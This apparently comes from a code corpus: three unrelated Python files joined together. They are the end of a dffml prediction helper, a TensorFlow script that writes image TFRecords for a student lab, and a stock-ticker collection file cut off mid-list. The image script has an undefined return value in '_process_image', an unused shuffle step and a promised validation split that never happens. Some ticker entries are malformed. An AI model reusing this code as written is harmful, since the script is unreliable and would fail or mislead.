Input data for prediction. Could be a ``dict``, :py:class:`Record`,
filename, or one of the data :doc:`/plugins/dffml_source`.
update : boolean, optional
If ``True`` prediction data within records will be written back to all
sources given. Defaults to ``False``.
keep_record : boolean, optional
If ``True`` the results will be kept as their ``Record`` objects instead
of being converted to a ``(record.key, features, predictions)`` tuple.
Defaults to ``False``.
Returns
-------
asynciterator
``Record`` objects or ``(record.key, features, predictions)`` tuple.
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> model = SLRModel(
... features=Features(
... Feature("Years", int, 1),
... ),
... predict=Feature("Salary", int, 1),
... directory="tempdir",
... )
>>>
>>> async def main():
... async for i, features, prediction in predict(
... model,
... {"Years": 6},
... {"Years": 7},
... ):
... features["Salary"] = round(prediction["Salary"]["value"])
... print(features)
>>>
>>> asyncio.run(main())
{'Years': 6, 'Salary': 70}
{'Years': 7, 'Salary': 80}
"""
sources = _records_to_sources(*args)
async with sources as sources, model as model:
async with sources() as sctx, model() as mctx:
async for record in mctx.predict(sctx):
yield record if keep_record else (
record.key,
record.features(),
record.predictions(),
)
if update:
await sctx.update(record)
|
build_image_data.py | #!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
This module implements TFRecords creation based on filetree and train/val ratio as a lab example for BSU students.
The image data set is expected to reside in JPEG files located in the following directory structure:
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into a sharded data set consisting of TFRecord files
output_directory/train-00000-of-01024
...
output_directory/train-01023-of-01024
and
output_directory/validation-00000-of-00128
...
output_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set.
The labels file contains a list of valid labels where each line corresponds to a label.
We map each label contained in the file to an integer corresponding to the line number starting from 0.
Each record within the TFRecord file is a serialized
Example proto. The Example proto contains many fields, the most important are:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
flags.DEFINE_string('input', default=None, help='Data directory')
flags.DEFINE_string('output', default=None, help='Output directory')
flags.DEFINE_integer('shards', 10, 'Number of shards per split of TFRecord files.')
flags.DEFINE_integer('num_threads', 2, 'Number of threads to preprocess the images.')
flags.DEFINE_string('labels_file', 'labels', 'Labels file')
FLAGS = flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
example = tf.train.Example(features=tf.train.Features(feature={
'image/label': _int64_feature(label),
'image/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
Returns:
image_buffer: string, JPEG encoding of RGB image.
"""
# Read the image file.
return image_data
def _process_image_files_batch(
thread_index, ranges, name, filenames, texts, labels, num_shards
):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output, output_filename)
writer = tf.io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
with tf.io.gfile.GFile(filename, 'rb') as f:
image_buffer = f.read()
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label, text)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
threads = []
for thread_index in range(len(ranges)):
args = (thread_index, ranges, name, filenames, texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.io.gfile.GFile(labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*.jpg' % (data_dir, text)
matching_files = tf.io.gfile.glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
label_index += 1
print('Found %d JPEG files across %d labels inside %s.' % (len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _shuffle(filenames, texts, labels, train_split):
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
return [filenames[i] for i in shuffled_index], \
[texts[i] for i in shuffled_index], \
[labels[i] for i in shuffled_index], \
[train_split[i] for i in shuffled_index]
def main(_):
assert FLAGS.input, ('Specify data root directory with --input flag')
assert FLAGS.output, ('Specify destination directory with --output flag')
assert not FLAGS.shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.shards')
print('Saving results to %s' % FLAGS.output)
if not os.path.exists(FLAGS.output):
os.makedirs(FLAGS.output)
# Get all files and split it to validation and training data
names, texts, labels = _find_image_files(os.path.join(FLAGS.input), FLAGS.labels_file)
_process_image_files('train', names, texts, labels, FLAGS.shards)
print(f'Dataset size: {len(names)}')
if __name__ == '__main__':
app.run(main)
|
DataCollector.py | import numpy as np
import yfinance as yf
import matplotlib.pyplot as plt
import datetime
from datetime import datetime
import pandas as pd
import multiprocessing
import matplotlib.lines
tickers0 = ["DDD","MMM","WBAI","WUBA","EGHT","AHC","AOS","ATEN","AIR","AAN","ABB","ABT","ABBV","ANF","AGD","AWP","ACP","JEQ","AOD","ABM","AKR","ACEL","ACEL.W","ACN","ACCO","ATV","AYI","GOLF","ADX","PEO","AGRO","ADNT","ADT","ATGE","AAP","ADSW","WMS","ASIX","AVK","ACM","AEFC","AEB","AEG","AER","AJRD","AMG","MGR","AFL","MITT","AGCO","A","AEM","ADC","AL","APD","ALG","AGI","ALK","AIN","ALB","AA","ALC","ALEX","ALX","ARE","AQN","AQNA","AQNB","BABA","Y","ATI","ALLE","AGN","ALE","ADS","AFB","AWF","AB","AIO","CBH","NCV","NCZ","ACV","NIE","NFJ","ALSN","ALL","ALLY","PINE","ALTG","ALTG.W","AYX","ATUS","MO","ACH","ALUS","ALUS.U","ALUS.W","AMBC","AMBC.W","ABEV","AMC","AMCR","AEE","AMRC","AMOV","AMX","AAT","AXL","ACC","AEO","AEP","AEL","AXP","AFG","AFGB","AFGC","AFGH","AMH","AIG","AIG.WS","ARL","ARA","AWR","AMT","AVD","AWK","COLD","AMP","ABC","RYCE","AMN","AMRX","AP","APH","AXR","HKIB","AME","PLAN","FINS","AU","BUD","AXE","NLY","AM","AR","ANTM","ANH","AON","APA","AIV","APY","APHA","ARI","APO","AFT","AIF","APLE","AIT","ATR","APTV","ARMK","ABR","ARC","MT","ARCH","ADM","AROC","ARNC","ARCO","ACA","RCUS","ARD","ASC","AFC","ACRE","ARDC","ARES","AGX","ARGD","ARGO","ANET","AI","AIC","AIW","ARLO","AHH","ARR","AFI","AWI","ARW","AJG","APAM","ASA","ABG","ASX","ASGN","AHT","ASH","ASPN","AMK","ASB","AC","AIZ","AIZP","AGO","AZN","HOME","T","TBB","TBC","ATTO","ATH","ATKR","AT","ATCO","ATO","ACB","ATHM","ALV","AN","AZO","AVLR","AVB","AGR","AVNS","AVTR","AVYA","AVY","AVH","AVA","AXTA","AXS","AX","AXO","AZUL","AZRE","AZZ","BGS","BW","BGH","BMI","BCSF","BKR","BBN","BLL","BANC","BBAR","BBVA","BBD","BBDO","BCH","BLX","BSBR","BSAC","BSMX","SAN","CIB","BXS","BAC","BOH","BMO","NTB","BNS","BKU","BCS","BBDC","MCI","MPV","BNED","B","GOLD","BHC","BAX","BTE","BBX","BCE","BZH","BDX","BDXA","BDC","BRBR","BHE","BRK.A","BRK.B","BHLB","BERY","BBY","BEST","BGSF","BHP","BBL","BIG","BH","BH.A","BILL","BHVN","BIO","BIO.B","BITA","BJ","BKH","BKI","BSM","BB","BGIO","BFZ","CII","BHK","HYT","BTZ","DSU","BGR","BDJ","EGF","FRA","BFO","BGT","BOE","BME","BMEZ","BAF","BKT","BGY","BKN","BTA","BZM","MHE","BIT","MUI","MNE","MUA","BKK","BBK","BBF","BYM","BFK","BLE","BTT","MEN","MUC","MUH","MHD","MFL","MUJ","MHN","MUE","MUS","MVT","MYC","MCA","MYD","MYF","MFT","MIY","MYJ","MYN","MPA","MQT","MYI","MQY","BNY","BQH","BSE","BFY","BCX","BST","BSTZ","BSD","BUI","BHV","BLK","BGB","BGX","BSL","BE","APRN","BXG","BXC","DCF","DHF","DMB","DSM","LEO","BA","BCC","BCEI","BOOT","BAH","BWA","BORR","SAM","BXP","BXP","BSX","BOX","BYD","BPMP","BP","BPT","BRC","BHR","BHR","BHR","BDN","BWG","LND","BAK","BRFS","BGG","MNRL","BFAM","BEDU","BSA","BSIG","BV","EAT","BCO","BMY","BMY~","BTI","BRX","BRMK","BR","BKD","BAM","BBU","DTLABI","BIP","RA","BEP","BEP","BRO","BF.A","BF.B","BRT","BC","BC","BC","BC","BKE","BVN","BBW","BG","BURL","BWXT","BY","PFH","CABO","CBT","COG","CACI","WHD","CADE","CAE","CAI","CAI","CAI","CAL","CRC","CWT","CALX","ELY","CPE","CPT","CCJ","CPB","CWH","GOOS","CM","CNI","CNQ","CP","CANG","CNNE","CAJ","CGC","CMD","COF","COF","COF","COF","COF","COF","CSU","BXMT","CPRI","CMO","CMO","CAH","CSL","KMX","CCL","CUK","CRS","CSV","CARR","CARS","CRI","CVNA","CSPR","CSLT","CTLT","CTT"]
tickers1 = ["SWP","SWT","STN","SGU","SRT","STWD","STT","STT","STT","SPLP","SPLP","SCS","SCA","SCM","SCL","STE","STL","STL","STC","SF","SF","SF","SFB","STM","EDF","EDI","STON","SRI","STOR","GJH","GJO","GJS","SYK","MSC","RGR","SPH","SMFG","INN","INN","INN","SUM","SMLP","SUI","SLF","SXC","SU","STG","NOVA","SUN","SHO","SHO","SHO","SPN","SUP","SUZ","SWZ","SWCH","SBE","SBE.U","SBE.WS","SYF","SYF","SNX","SNV","SNV","SNV","GJP","GJR","GJT","SYY","SYX","TLRD","TWN","TSM","TAK","TAL","TGE","TALO","SKT","TPR","NGLS","TRGP","TGT","TARO","TTM","TCO","TCO","TCO","TMHC","TRP","TCP","TSI","TEL","TISI","FTI","TECK","TK","TGP","TGP","TGP","TNK","TGNA","TRC","HQH","THQ","HQL","THW","TDOC","TEO","TDY","TFX","VIV","TEF","TDA","TDE","TDI","TDJ","TDS","TU","TDF","EMF","TEI","GIM","TPX","TS","TME","THC","TNC","TEN","TVC","TVE","TDC","TEX","TX","TRNO","TTI","TEVA","TPL","TGH","TXT","TFII","AES","BK","BK","BX","CEE","SCHW","SCHW","SCHW","COO","GDV","GDV","GDV","GDV","GRX","GRX","GDL","GDL","THG","THGA","MSG","RUBI","TRV","VAM","TMO","THR","TPRE","TSLF","TCRW","TCRZ","TRI","THO","TDW","TDW.WS","TDW.WS","TIF","TLYS","TSU","TKR","TMST","TWI","TJX","TOL","TR","BLD","TTC","TD","SHLL","SHLL.U","SHLL.W","NDP","TYG","TEAF","NTG","TTP","TPZ","TOT","TSQ","TM","TRTX","TSLX","TT","TAC","TCI","TDG","RIG","TGS","TRU","TREC","TG","THS","TREX","TY","TYTPH","TRNE","TRNE.U","TRNE.W","TNET","TRN","TSE","TPVG","TPVY","GTS","TRTN","TRTN","TRTN","TRTN","TRTN","TGI","TROX","TBI","TFC","TFC","TFC","TFC","TFC","TNP","TNP","TNP","TNP","TNP","TUFN","TUP","TKC","TPB","TRQ","TPC","TWLO","TRWH","TWTR","TWO","TWO","TWO","TWO","TWO","TWO","TYL","TSN","USB","USB","USB","USB","USB","USB","USPH","SLCA","USX","UBER","UI","UBS","UDR","UGI","UGP","UMH","UMH","UMH","UMH","UA","UAA","UFI","UNF","UN","UL","UNP","UIS","UNT","UMC","UNFI","UPS","URI","USM","UZA","UZB","UZC","X","UNH","UTL","UNVR","UVV","UHT","UHS","UVE","UTI","UNM","UNMA","UE","UBA","UBP","UBP","UBP","USFD","USAC","USNA","USDP","BIF","VFC","EGY","MTN","VAL","VALE","VLO","VHI","VMI","VVV","VAPO","VAR","VGR","VEC","VEDL","VEEV","VEL","VNTR","VTR","VNE","VER","VER","VRTV","VZ","VET","VRS","VCIF","VERT.U","VRT","VRT.WS","VVI","VICI","VNCE","VIPS","SPCE","VGI","ZTR","V","VSH","VPG","VIST","VSTO","VST","VST.WS","VVNT","VVNT.W","VSLR","VMW","VOC","VCRA","VNO","VNO","VNO","VNO","VJET","IAE","IHD","VOYA","VOYA","IGA","IGD","IDE","IID","IRR","PPR","VMC","WTI","WPC","WRB","WRB","WRB","WRB","WRB","WRB","GRA","GWW","WNC","WBC","WDR","WD","WMT","DIS","HCC","WPG","WPG","WPG","WRE","WCN","WM","WAT","WSO","WSO.B","WTS","W","WBS","WBS","WEC","WEI","WRI","WMK","WBT","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","WFC","EOD","WELL","WCC","WST","WAL","WALA","WEA","TLI","EMD","GDO","EHI","HIX","HIO","HYI","SBI","IGI","PAI","MMU","WMC","DMO","MTT","MHF","MNP","GFY","WIW","WIA","WES","WU","WAB","WLK","WLKP","WBK","WRK","WHG","WEX","WY","WPM","WHR","WTM","WSR","WLL","WOW","WMB","WSM","WGO","WIT","WNS","WWW","WF","WK","INT","WWE","WOR","WPP","WPX","WYND","WH","XYF","XFLT","XHR","XRX","XIN","XPO","XYL","AUY","YELP","YETI","YEXT","YRD","DAO","YPF","YUMC","YUM","ZEN","ZBH","ZTS","ZTO","ZUO","ZYME"]
tickers2 = ["CAT","CATO","CBZ","CBL","CBL","CBL","CBO","IGR","CBRE","CBX","FUN","CDR","CDR","CDR","CE","CLS","CELG~","CEL","CPAC","CX","CVE","CNC","CEN","CNP","CNP","EBR","EBR.B","CEPU","CCS","CTL","CDAY","CF","GIB","ECOM","CHAP","CHRA","CRL","CLDT","CMCM","CHGG","CHE","CC","CHMI","CHMI","CHMI","CHK","CHK","CPK","CVX","CHWY","CHS","CIM","CIM","CIM","CIM","CIM","DL","CEA","CHN","CGA","LFC","CHL","COE","SNP","XRF","ZNH","CHA","CHU","CYD","CMG","CHH","CB","CHT","CHD","CCX","CCX.U","CCX.WS","CCXX","CCXX.U","CCXX.W","CIEN","CI","XEC","CBB","CBB","CNK","CINR","CIR","CIT","CIT","CCAC","CCAC.U","CCAC.W","BLW","C","C","C","C","C","CFG","CFG","CFG","CIA","CIO","CIO","CVEO","CCC","CLH","CCO","EMO","CEM","CTR","CLW","CWEN","CWEN.A","CLF","CLPR","CLX","CLDR","NET","CMS","CMS","CMSA","CMSC","CMSD","CNA","CNF","CNHI","CNO","CEO","CNXM","CNX","KOF","KO","CCEP","CDE","FOF","CNS","UTF","LDP","MIE","RQI","RNP","PSF","RFI","CFX","CFXA","CL","CCH","CCH.U","CCH.WS","CXE","CIF","CXH","CMU","CLNY","CLNY","CLNY","CLNY","CLNY","CLNC","CXP","STK","CCZ","CMA","FIX","CMC","CBU","CYH","CHCT","CIG","CIG.C","CBD","SBS","ELP","CCU","CODI","CODI","CODI","CODI","CMP","CRK","CAG","CXO","CCM","CNMD","COP","CCR","CEIX","ED","STZ","STZ.B","CSTM","TCS","CLR","VLRS","CTRA","CTB","CPS","CTK","CPA","CLB","CXW","CLGX","CORR","CORR","CPLG","COR","CNR","GLW","CAAP","GYC","OFC","CTVA","CZZ","CMRE","CMRE","CMRE","CMRE","CMRE","COTY","CUZ","CVA","CVIA","CPF","CR","CRD.A","CRD.B","BAP","CS","CPG","CEQP","CEQPCR","CRT","CAPL","CCI","CCI","CCK","CRY","CTS","CUBE","CUB","CFR","CULP","CMI","CURO","CW","SRF","SRV","SZC","CWK","CUBB","CUBI","CUBI","CUBI","CUBI","CUBI","CVI","UAN","CVS","CELP","DHI","DAN","DHR","DHR","DAC","DQ","DRI","DAR","DVA","DCP","DCP","DCP","DECK","DE","DEX","DDF","DKL","DK","DELL","DLPH","DAL","DLX","DNR","DBI","DESP","DB","DXB.CL","DVN","DHX","DHT","DEO","DO","DSSI","DRH","DSX","DSX","DKS","DBD","DLR","DLR","DLR","DLR","DLR","DLR","DLR","DDS","DDT","DIN","DFS","DNI","DMYT","DMYT.U","DMYT.W","DLB","DG","D","DCUE","DRUA","DPZ","UFS","DCI","DFIN","LPG","DSL","DBL","DLY","PLOW","DEI","DOV","DVD","DOW","RDY","DRD","DRQ","DS","DS","DS","DS","DTE","DTJ","DTP","DTQ","DTW","DTY","DCO","DSE","DNP","DTF","DUC","DPG","DUK","DUK","DUKB","DUKH","DRE","DD","DXC","DY","DLNG","DLNG","DLNG","DT","DX","DX","DX","CTA","CTA","ELF","EGIF","EXP","ECC","ECCB","ECCX","ECCY","EIC","ESTE","DEA","EGP","EMN","KODK","ETN","ETV","ETW","EV","EOI","EOS","EFT","EFL","EFF","EHT","ETX","EOT","EVN","ETJ","EFR","EVF","EVG","EVT","ETO","ETG","ETB","EXD","ETY","EXG","ECT","ECL","EC","EPC","EIX","EW","EP","EE","ELAN","ELAT","ESTC","EGO","ESI","ELVT","LLY","EFC","EFC","EARN","AKO.A","AKO.B","ERJ","EME","EEX","EBS","EMR","ESRT","EIG","EDN","ENBL","ENB","ENBA","EHC","DAVA","EXK","ENIA","ENIC","ENR","ENR","ET","ETP","ETP","ETP","EPAC","ERF","ENS","E","ENLC","EBF","ENVA","NPO","ETM","EAB","EAE","EAI","ETR","ELC","ELJ","ELU","EMP","ENJ","ENO","ETIEZT","EPD","EVC","ENV","NVST","EVA","ENZ","EOG","EPAM","EPR","EPR","EPR","EPR","EQM","EQT","EFX","EQNR","EQH","EQH","ETRN","EQC","EQC","ELS","EQR","EQS","ERA","EROS","ESE","ESNT","EPRT","WTRG","WTRU","ESS","EL","ETH","EURN","EEA","EB"]
tickers3 = ["EVR","RE","EVRG","EVRI","ES","EVTC","EVH","AQUA","XAN","XAN","EXPR","EXTN","EXR","XOM","FNB","FNB","FN","FDS","FICO","SFUN","FPAC","FPAC.U","FPAC.W","FTCH","FPI","FPI","FSLY","FBK","FFG","AGM","AGM.A","AGM","AGM","AGM","FRT","FRT","FSS","FHI","FMN","FDX","RACE","FOE","FG","FG.WS","FCAU","FNF","FIS","FMO","FINV","FAF","FBP","FCF","FHN","FHN","FR","AG","FRC","FRC","FRC","FRC","FRC","FRC","FFA","FMY","FDEU","FIF","FSD","FPF","FEI","FPL","FIV","FCT","FGB","FEO","FAM","FE","FIT","FPH","FVRR","FBC","DFP","PFD","PFO","FFC","FLC","FLT","FLNG","FND","FTK","FLO","FLS","FLR","FLY","FEAC.U","FMC","FMX","FL","F","F","F","FOR","FTS","FTV","FTV","FTAI","FTAI","FTAI","FSM","FBHS","FET","FBM","FCPT","FEDU","FNV","FC","FSB","BEN","FT","FI","FCX","FMS","FDP","RESI","FRO","FSK","FCN","FTSI","FF","GCV","GAB","GAB","GAB","GAB","GAB","GGZ","GGZ","GGT","GGT","GGT","GUT","GUT","GUT","GCAP","GLEO","GLEO.U","GLEO.W","GBL","GNT","GNT","GME","GCI","GPS","GTX","IT","GLOG","GLOG","GLOP","GLOP","GLOP","GLOP","GTES","GATX","GMTA","GCP","GNK","GNRC","GAM","GAM","GD","GE","GIS","GM","GCO","GEL","GEN","GNE","GNE","G","GPC","GNW","GEO","GPRK","GPJA","GGB","GTY","GFL","GFLU","GIX","GIX.U","GIX.WS","GIX~","GIL","GLT","GKOS","GSK","CO","GMRE","GMRE","GNL","GNL","GNL","GLP","GLP","GPN","GSL","GSL","GSLD","GLOB","GL","GL","GMED","GMS","GNC","GDDY","GOL","GFI","GSBD","GS","GS","GS","GS","GS","GS","GS","GER","GMZ","GRC","GPX","GGG","GRAF","GRAF.U","GRAF.W","EAF","GHM","GHC","GRAM","GVA","GPMT","GRP.U","GPK","GTN","GTN.A","AJX","AJXA","GWB","GDOT","GBX","GHL","GHG","GEF","GEF.B","GFF","GPI","GRUB","PAC","ASR","AVAL","SUPV","TV","GSX","GTT","GSH","GES","GGM","GPM","GOF","GBAB","GWRE","HRB","FUL","HAE","HAL","HBB","HBI","HNGR","HASI","HOG","HMY","HSC","HHS","HGH","HIG","HIG","HVT","HVT.A","HE","HCHC","HCA","HCI","HDB","HR","HTA","PEAK","HL","HL","HEI","HEI.A","HLX","HP","HLF","HRI","HCXY","HCXZ","HTGC","HRTG","PSV","HT","HT","HT","HT","HSY","HTZ","HES","HESM","HPE","HXL","HEXO","HCR","PCF","HGLB","HFRO","HFRO","HPR","HIW","HIL","HI","HRC","HTH","HGV","HLT","HNI","HMLP","HMLP","HEP","HFC","HD","HMC","HON","HMN","HZN","HTFA","HRL","HST","HLI","HOV","HHC","HWM","HPQ","HSBC","HSBC","HMI","HNP","HUBB","HUBS","HBM","HUD","HPP","HUM","HCFT","HII","HUN","HUYA","H","HY","IAA","IAG","IBN","IDA","IEX","IDT","INFO","ITW","IMAX","ICD","IHC","IRT","IFN","IBA","INFY","ING","IR","NGVT","INGR","IIPR","IIPR","IPHI","INSI","NSP","INSP","IBP","ITGR","I","ICE","IHG","IFS","IBM","IFF","IFFT","IGT","IP","INSW","INSW","IPV","IPV.U","IPV.WS","IPG","IPI","IVC","VBF","VCV","VTA","IHIT","IHTA","VLT","IVR","IVR","IVR","IVR","OIA","VMO","VKQ","VPV","IVZ","IQI","VVR","VTN","VGM","IIM","IRET","IRET","NVTA","INVH","IO","IQV","IRM","IRS","ICL","STAR","STAR","STAR","STAR","ITCB","ITUB","ITT","IVH","JPM","JPM","JPM","JPM","JPM","JPM","JAX","JILL","JCP","SJM","JBL","J","JHX","JHG","JOF","JBGS","JEF","JELD","JCAP","JCAP","JT","JKS","JMP","JBT","BTO","HEQ","JHS","JHI","HPF","HPI","HPS","PDT","HTD","HTY","JW.A","JW.B","JNJ","JCI","JLL","JMIA","JIH","JIH.U","JIH.WS","JNPR","JP","JE","JE","LRN","KAI","KDMN","KAMN","KSU","KSUKAR","KMF","KYN","KB","KBH","KBR","K","KEM","KMPR"]
tickers4 = ["KMT","KW","KEN","KDP","KEY","KEY","KEY","KEY","KEYS","KRC","KRP","KMB","KIM","KIM","KIM","KMI","KFS","KGC","KEX","KL","KRG","KKR","KKR","KKR","KIO","KREF","KNX","KNL","KNOP","KN","KSS","PHG","KTB","KOP","KEP","KF","KFY","KOS","KRA","KR","KRO","KT","LB","SCX","LHX","LH","LADR","LAIX","LW","LCI","LPI","LVS","LTM","LGI","LAZ","LZB","LCII","LEAF","LEA","LEE","LGC","LGC.U","LGC.WS","LM","LMHA","LMHB","LEG","JBK","KTH","KTN","KTP","LDOS","LEJU","LC","LEN","LEN.B","LII","LHC","LHC.U","LHC.WS","LEVI","LXP","LXP","LPL","DFNS","DFNS.U","DFNS.W","USA","ASG","LBRT","LSI","LITB","LNC","LIN","LNN","LN","LINX","LGF.A","LGF.B","LAD","LAC","LYV","LTHM","RAMP","LYG","SCD","LMT","L","LOMA","LPX","LOW","LXU","LTC","LUB","LL","LXFR","LDL","LYB","MTB","MDC","MHO","MAC","CLI","MFD","MGU","MIC","BMA","M","MCN","MSGE$","MSGS$","MMP","MGA","MX","MGY","MH","MH","MH","MHLA","MHNC","MAIN","MMD","MNK","MANU","MTW","MN","MAN","MFC","MRO","MPC","MMI","MCS","MPX","HZO","MKL","VAC","MMC","MLM","MAS","DOOR","MTZ","MA","MTDR","MTRN","MATX","MLP","MAXR","MMS","MXL","MEC","MBI","MKC","MKC.V","MCD","MUX","MCK","MDU","MTL","MTLMDL","MPW","MED","MCC","MCV","MCX","MDLQ","MDLX","MDLY","MD","MDT","MFAC","MFAC.U","MFAC.W","MRK","MCY","MDP","MTH","MTOR","MER","PIY","MTR","MSB","MEI","MET","MET","MET","MET","MCB","MTD","MXE","MXF","MFA","MFA","MFA","MFO","MCR","MGF","MIN","MMT","MFM","MFV","MTG","MGP","MGM","MFGP","MAA","MAA","AMPY","MLR","HIE","MTX","MG","MUFG","MIXT","MFG","MBT","MODN","MOD","MC","MOGU","MHK","MOH","TAP","TAP.A","MNR","MNR","MR","MCO","MOG.A","MOG.B","MS","MS","MS","MS","MS","MS","MS","CAF","MSD","EDD","IIF","MOS","MSI","MOV","MPLX","MRC","HJV","MSA","MSM","MSCI","MSGN","MLI","MWA","MVF","MZA","MUR","MUSA","MVO","MVC","MVCD","MYE","MYOV","NBR","NBR","NC","NTP","NTEST","NTEST.","NTEST.","NTEST.","NBHC","NFG","NGG","NHI","NOV","NPK","NNN","NNN","NRUC","SID","NSA","NSA","NTCO","NGS","NGVC","NRP","NTZ","NLS","NVGS","NNA","NM","NM","NM","NMM","NAV","NAV","NCR","NP","NNI","NPTN","NSCO","NSCO.W","NVRO","HYB","NFH","NFH.WS","GF","NWHM","IRL","NMFC","NMFX","EDU","NEWR","NRZ","NRZ","NRZ","NRZ","SNR","NYCB","NYCB","NYCB","NYT","NJR","NEU","NEM","NR","NEXA","NREF","NXRT","NHF","NEP","NEE","NEE","NEE","NEE","NEE","NEE","NEE","NEX","NGL","NGL","NGL","NMK","NMK","NLSN","NKE","NINE","NIO","NI","NI","NL","NOAH","NE","NOK","NOMD","NMR","OSB","NAT","JWN","NSC","NOA","NRT","NOC","NWN","NWE","NCLH","NVS","NVO","DNOW","NRG","NUS","NUE","NS","NS","NS","NS","NSS","NTR","JMLP","NVG","NUV","NUW","NEA","NAZ","NKX","NCB","NCA","NAC","JCE","J